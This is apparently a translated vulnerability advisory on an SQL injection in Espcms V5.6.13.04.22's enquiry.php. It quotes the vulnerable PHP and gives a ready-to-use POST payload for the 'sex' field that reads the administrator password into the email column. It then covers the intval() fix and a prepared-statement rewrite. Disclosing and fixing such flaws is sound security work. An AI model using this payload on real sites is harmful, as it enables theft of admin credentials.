Espcms V5.6.13.04.22 UTF8 official release has an SQL injection in one file that allows the administrator account and password to be retrieved. In the file \interface\enquiry.php:
```php
function in_enquirysave() {
    parent::start_pagetemplate();
    $this->fun->formpathver();
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    if ($this->CON['is_enquiry_memclass']) {
        parent::member_purview(0, $this->get_link('enquiry', array(), admin_LNG));
    }
    $cartid = $this->fun->eccode($this->fun->accept('ecisp_enquiry_list', 'C'), 'DECODE', db_pscode);
    $cartid = stripslashes(htmlspecialchars_decode($cartid));
    $uncartid = !empty($cartid) ? unserialize($cartid) : 0;
    $userid = intval($this->fun->accept('userid', 'P'));   // userid is cast to int ...
    $userid = !empty($userid) ? $userid : 0;
    $linkman = trim($this->fun->accept('linkman', 'P', true, true));
    $email = $this->fun->accept('email', 'P');
    $sex = $this->fun->accept('sex', 'P');                  // ... but sex is taken from POST as-is
    $sex = empty($sex) ? 0 : $sex;
```

The `$sex` variable is not filtered with `intval()`, and in the SQL below it is not enclosed in single quotes either:

```php
    $db_field = 'enquirysn,userid,linkman,sex,country,province,city,district,address,zipcode,tel,fax,mobile,email,content,isclass,addtime,edittime';
    // $sex is interpolated unquoted, so its value becomes part of the SQL syntax
    $db_values = "'$enquirysn',$userid,'$linkman',$sex,$country,$province,$city,$district,'$address','$zipcode','$tel','$fax','$mobile','$email','$content',0,$addtime,0";
    $this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');
```

Set the `sex` value to the following:
```text
sex=0,0,0,0,0,1,0,13800000000,0,13800000000,(select password from espcms_admin_member limit 1),0,0,1368528987,0)%23
```

This inserts the administrator's password into the email address field.
Fix: filter the value with `intval()`.
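As an added example (not Espcms's own code), the hardened handling of the same input: every column the original interpolated unquoted is cast with `intval()`, so the payload above collapses to the integer 0, and the row is written through a prepared statement instead of a rebuilt VALUES string. The table name, the reduced column list and the mysqli connection are assumptions for the example.

```php
<?php
// Added example, not Espcms code: hardened version of the value handling
// in in_enquirysave(). Constructed sample of attacker-controlled POST data,
// using the payload from the writeup as the 'sex' field.
$post = [
    'userid'  => '7',
    'sex'     => '0,0,0,0,0,1,0,13800000000,0,13800000000,'
               . '(select password from espcms_admin_member limit 1),0,0,1368528987,0)#',
    'linkman' => 'test',
    'email'   => 'test@example.com',
];

// intval() keeps only a leading integer; any SQL tail is discarded.
// In the original this is the one-line fix: $sex = intval($this->fun->accept('sex', 'P'));
function enquiry_int(array $src, string $key): int
{
    return isset($src[$key]) ? intval($src[$key]) : 0;
}

$sex    = enquiry_int($post, 'sex');     // 0, no longer an SQL fragment
$userid = enquiry_int($post, 'userid');  // 7
var_dump($sex, $userid);

// Even with intval() in place, do not rebuild $db_values by string interpolation;
// bind every column so the integers can never alter the statement structure.
// $db_table is assumed here; the original takes it from the caller.
function insert_enquiry(mysqli $db, string $db_table, array $row): bool
{
    $sql = 'INSERT INTO ' . $db_table
         . ' (enquirysn, userid, linkman, sex, email, addtime) VALUES (?, ?, ?, ?, ?, ?)';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return false;
    }
    // s = string, i = integer: sex and userid are sent as typed integers
    $stmt->bind_param('sisisi', $row['enquirysn'], $row['userid'], $row['linkman'],
                      $row['sex'], $row['email'], $row['addtime']);
    return $stmt->execute();
}
```

Running the first part offline prints `int(0)` and `int(7)`; `insert_enquiry()` needs a live mysqli connection and the assumed table.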
Source article: Espcms V5.6.13.04.22 UTF8 official release injection vulnerability, part 4/N (网站安).